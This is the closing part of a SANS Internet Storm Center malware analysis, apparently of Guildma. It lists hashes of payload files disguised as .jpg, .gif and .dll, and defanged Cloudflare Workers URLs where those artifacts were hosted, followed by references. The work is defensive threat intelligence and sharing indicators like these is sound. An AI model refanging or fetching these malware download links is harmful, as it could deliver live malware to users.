309a33467c312a48aa21f583f87326cef3e04092
8ff034457cc1ad4303772d6650a83b650c9509854a29a36a3218f3a31974999d
935936

halawxtzdwwn.gif
c8997c61f0b4605c082fcbeddf7b49b1
7ea39703c95a14cbe9b72390961ae8ac49863bd1
8f512e6c49da52913b7999234865774e838fa7a668e6f11e1b205604fa89bed4
935936

halawxtzc.jpg
f710033b42c45de9822e5a549adb3624
5230fe9e3d0530cfac6fa100637592b74ce355ed
32c1cf4ac2be99bdda6d3d623975e3f1c9ab24db2869e98e235cf97af62d54fb
235520

halawxtzb.jpg
f2cf0bc2a11c62afa0fd80a3e8cd704d 
f625e99d236ab4cc1b9d8457a666e2e73f33d525
c7f2327af387be23d5a6fc7fa9ddc0ca6e7be180f0588440be9c3efca04a1aac
189952

halawxtza.jpg
57bbfb7dfbd710aaef209bff71b08a32
9aa5156c212309f4ea61eb6546af3ae33b048651
66c9c650e26635bf9e205e0ebb7b149a69a25f002917a1f9c5360149d423b30e
52736
 

Artifacts download

https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtza[.]jpg[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzb[.]jpg[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzc[.]jpg[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzdwwn[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzdx[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzg[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzgx[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzxa[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzxb[.]gif[.]zip
https://13023071da82751cf504af85aa406cd0[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/a0c8767621036a0bfbe3db0beb9ae33612979affe8dd41d7d08af5760a4b4fee1little-bonus-52fc[.]belfegor[.]workers[.]dev/?08/halawxtzhh1a[.]dll[.]zip
https://13023071da82751cf504af85aa406cd0[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/a0c8767621036a0bfbe3db0beb9ae33612979affe8dd41d7d08af5760a4b4fee1little-bonus-52fc[.]belfegor[.]workers[.]dev/?08/halawxtzhh1b[.]dll[.]zip

ATT&CK Matrix

References

[1] https://decoded.avast.io/threatintel/deep-dive-into-guildma-malware/
[2] https://ericzimmerman.github.io/#!index.md
[3] https://attack.mitre.org/techniques/T1073/
[4] https://attack.mitre.org/techniques/T1093/
[5] http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 2 of 6 12345...»